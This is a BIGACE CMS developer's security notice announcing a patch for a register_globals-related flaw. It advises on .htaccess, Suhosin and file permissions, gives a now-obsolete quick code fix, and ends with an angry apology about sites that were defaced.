Patch to fix the issue

Download the Patch from the Sourceforge download page - direct link

Install it using the BIGACE Admin Panel: System / Extensions / Upload.

For discussion, come to this Forum thread in General/Security.

Background Infos

Which sites are in danger?

First of all, the problem occures not in all circumstances (as you can see from this page).

The problem only exists, if your environment has activated the "register_globals" PHP setting, which is asked be turned "Off" during installation.

You should also check if you installed the .htaccess files used to block access to the system (/system/, /consumer/) directorys. File permission (see below) increase security even more.

What else? Ask/Push your hoster to install a PHP Hardener patch like Suhosin. It increases security of PHP environments alot, especially for currently unknown software flaws.

File permissions

The following is always true, not just because of the current problem.

Make sure, to check your file permissions:

  • http://localhost/bigace/addon/smarty/plugins/function.captcha.php
  • http://localhost/bigace/system/application/util/item_information.php
  • http://localhost/bigace/system/application/util/jstree.php
  • http://localhost/bigace/system/classes/sql/AdoDBConnection.php
  • http://localhost/bigace/system/admin/plugins/menu/menuTree/plugin.php

These files are NOT ALLOWED to be accessed by a browser.

Quick code fixes

The following code change is obsolete, due to the released patch!

One quick fix is to edit the file "/addon/smarty/plugins/function.captcha.php":

Move line 3 (require_once) into the function itself:

// ... 
function smarty_function_captcha($params, &$smarty)
// ...

Sorry folks!

I am really, really sorry about the problems, some sites got already defaced.

The  people who found the problem did NOT try to contact me, they released the exploit without any warning on "known pages", which I not regular check.

Starting a discussion about HOW MUCH I HATE THOSE IDIOTS who ruin other peoples (mostly private) work is worthless. Finding security holes is a good job and I respect people with the ability to search and find problems in software, but:
Not if they use their knowledge for such stupid attacks, only meant to destroy!

Want to say thanks to the people, that released this exploits without a warning?! You find their website within the exploit code at the milw0rm page.


PS: my log file is full with attacks, all days long ... just to let you know you great "hackers" out there: Suhosin patch installed, GLOBALS as parameter is NOT allowed!